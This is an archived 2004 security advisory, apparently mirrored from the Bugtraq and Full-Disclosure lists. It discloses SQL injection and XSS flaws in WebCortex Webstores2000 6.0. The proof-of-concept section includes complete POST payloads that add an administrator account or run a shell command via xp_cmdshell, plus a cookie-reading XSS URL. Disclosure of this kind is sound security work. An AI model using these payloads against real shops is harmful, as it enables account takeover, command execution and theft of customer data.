lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <40336D56.80002@s-quadra.com>
Date: Wed, 18 Feb 2004 16:49:10 +0300
From: Nick Gudov <cipher@...uadra.com>
To: full-disclosure <full-disclosure@...ts.netsys.com>,
	bugtraq <bugtraq@...urityfocus.com>
Subject: WebCortex Webstores2000 version 6.0 multiple security vulnerabilities


          S-Quadra Advisory #2004-02-18

Topic: WebCortex Webstores2000 version 6.0 multiple security vulnerabilities
Severity: High
Vendor URL: http://www.webcortex.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040218.txt
Release date: 18 Feb 2004

 1. DESCRIPTION

 Webstores2000 is a complete solution for building shopping carts and 
shopping malls
for e-commerce enabled sites. Its written on ASP, works on most Windows 
platforms
and uses MS Access or MS SQL Server as a backend.
Please visit http://www.webcortex.com for information about Webstores2000.

 2. DETAILS

  -- Vulnerability 1: SQL Injection vulnerability

 An SQL Injection vulnerability has been found in the 'browse_items.asp' 
script

 User supplied input is not filtered before being used in a SQL query. 
Consequently,
query modification using malformed input is possible.

 Successfull exploitation of this vulnerability could allow an attacker 
to gain
administrative access to shopping mall and read any information from
database (i.e. customers private data). Also an attacker could execute 
arbitrary
commands using xp_cmdshell function.

  -- Vulnerability 2: Cross Site Scripting vulnerability in 'error.asp'

 By injecting specially crafted javascript code in url and tricking a 
user to visit
it a remote attacker can steal user session id and gain access to user's 
personal data.

 --PoC code

  --Vulnerability 1:

 Platform: MS SQL Server as a backend

 Posting this data to browse_items.asp creates new administrative account
 
Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Quantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3Binsert+into+Mall_Logins+%28Mall_User_Id%2C+Mall_Password%29+values+%281%2C2%29--&Search_Store.x=0&Search_Store.y=0

 Posting this data to browse_items.asp executes 'dir c:' command
 
Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Quantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3Bexec+master..xp_cmdshell+%27dir+c%3A+%3E+c%3A%5Cresdirc.txt%27--&Search_Store.x=39&Search_Store.y=4

  -- Vulnerability 2:

 http://[target]/error.asp?Message_id=35<script>alert(document.cookie)</script>
 
 3. FIX INFORMATION
 S-Quadra alerted WebCortex development team to this issue on 13th 
February 2004.
The following response from Shay Sabah has been received:
"OK... All of these have been fixed...
Now, I ask you to please STOP using our software and making all these 
"security" emails..."
 
 4. CREDITS

 Nick Gudov <cipher@...uadra.com> is responsible for discovering this issue.

 5. ABOUT

 S-Quadra offers services in computer security, penetration testing and 
network assesment,
web application security, source code review and third party product 
vulnerability assesment,
forensic support and reverse engineering.

           S-Quadra Advisory #2004-02-18


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ